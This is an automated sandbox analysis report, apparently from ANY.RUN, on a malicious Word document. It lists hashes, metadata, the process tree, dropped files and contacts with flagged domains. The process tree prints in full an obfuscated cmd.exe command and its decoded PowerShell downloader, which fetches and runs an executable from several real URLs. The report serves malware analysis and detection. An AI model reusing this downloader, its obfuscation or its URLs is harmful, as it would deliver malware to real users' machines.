File name: | FA_9016006.doc |
Full analysis: | https://app.any.run/tasks/72688bcd-17c5-43ff-9c20-9a137703ed8b |
Verdict: | Malicious activity |
Analysis date: | March 14, 2019, 14:28:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 12:09:00 2019, Last Saved Time/Date: Tue Jan 15 12:09:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | 5AAAAE4E611FE7731F0C798F801EF685 |
SHA1: | C57A1B3D411E1588C99E35EB33686483C2A17C0A |
SHA256: | CD4AE834983FF4189D1D0FD22E71A8B81476FE5E380FAA14D106C906F34DBBB7 |
SSDEEP: | 1536:SR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadpVA+FdQMspn9+a9Q:SR8GhDS0o9zTGOZD6EbzCdpVAiqMOI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 3 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 3 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:01:15 12:09:00 |
CreateDate: | 2019:01:15 12:09:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3360 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA_9016006.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2872 | "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3476 | CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3724 | C:\Windows\system32\cmd.exe /S /D /c" ecHO %3fr% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3812 | cmD | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2244 | powershell $onlinewt='moderatorvr';$InvestmentAccountos=new-object Net.WebClient;$Ergonomicvs='http://www.niteshagrico.com/z7ISltpB@http://www.tenmiengiarenhat.com/bIfcRi8Kc@http://www.hopeintlschool.org/ebIV1do@http://www.dnenes.com.mx/Wmv9Lwru@http://kynangtuhoc.com/h6pTDOH'.Split('@');$GroceryAutomotiveAutomotivews='ROIso';$SmallFreshTunaaj = '224';$MoneyMarketAccountir='plugandplaywz';$HeardIslandandMcDonaldIslandski=$env:public+'\'+$SmallFreshTunaaj+'.exe';foreach($depositpq in $Ergonomicvs){try{$InvestmentAccountos.DownloadFile($depositpq, $HeardIslandandMcDonaldIslandski);$generatingjk='initiativeshi';If ((Get-Item $HeardIslandandMcDonaldIslandski).length -ge 80000) {Invoke-Item $HeardIslandandMcDonaldIslandski;$PersonalLoanAccountrf='Automotivevz';break;}}catch{}}$paradigmsdc='IncredibleConcreteKeyboardal'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR85A1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5CDE28A.wmf | — | |
MD5:— | SHA256:— | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\169D8B28.wmf | — | |
MD5:— | SHA256:— | |||
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\048FAGCNPJZYTATA2AYU.temp | — | |
MD5:— | SHA256:— | |||
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1993ca.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$_9016006.doc | pgc | |
MD5:625885D3AE4973484FB02F07B55705AF | SHA256:A2017C0F887B9603F897917E5467C3A64C8C6BC7D93ABD0B01E78FA5A8089045 | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BCA7725C8CB9C8D63EC166E879124B21 | SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73 | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:E20DA999982389B296171208E9568D51 | SHA256:81F8DC32D3490E07DEE46D8CF137753CC7EA4A8D62A018F0BF6674100C571B3A | |||
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3317D03.wmf | wmf | |
MD5:617590F0686262333195DBA8071059B3 | SHA256:6C4F26D27658913C253054AB21319C899D3DFF14EB0FC5CD1611CBC2FED359F3 | |||
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2244 | powershell.exe | GET | — | 103.28.38.93:80 | http://www.tenmiengiarenhat.com/bIfcRi8Kc | VN | — | — | malicious |
2244 | powershell.exe | GET | — | 103.28.38.93:80 | http://www.tenmiengiarenhat.com/bIfcRi8Kc | VN | — | — | malicious |
2244 | powershell.exe | GET | — | 111.198.158.123:80 | http://www.hopeintlschool.org/ebIV1do | CN | — | — | malicious |
2244 | powershell.exe | GET | 404 | 108.167.146.99:80 | http://www.niteshagrico.com/z7ISltpB | US | html | 8.05 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2244 | powershell.exe | 103.28.38.93:80 | www.tenmiengiarenhat.com | NhanHoa Software company | VN | malicious |
2244 | powershell.exe | 108.167.146.99:80 | www.niteshagrico.com | CyrusOne LLC | US | malicious |
2244 | powershell.exe | 111.198.158.123:80 | www.hopeintlschool.org | China Unicom Beijing Province Network | CN | malicious |
Domain | IP | Reputation |
---|---|---|
www.niteshagrico.com |
| malicious |
www.tenmiengiarenhat.com |
| malicious |
www.hopeintlschool.org |
| malicious |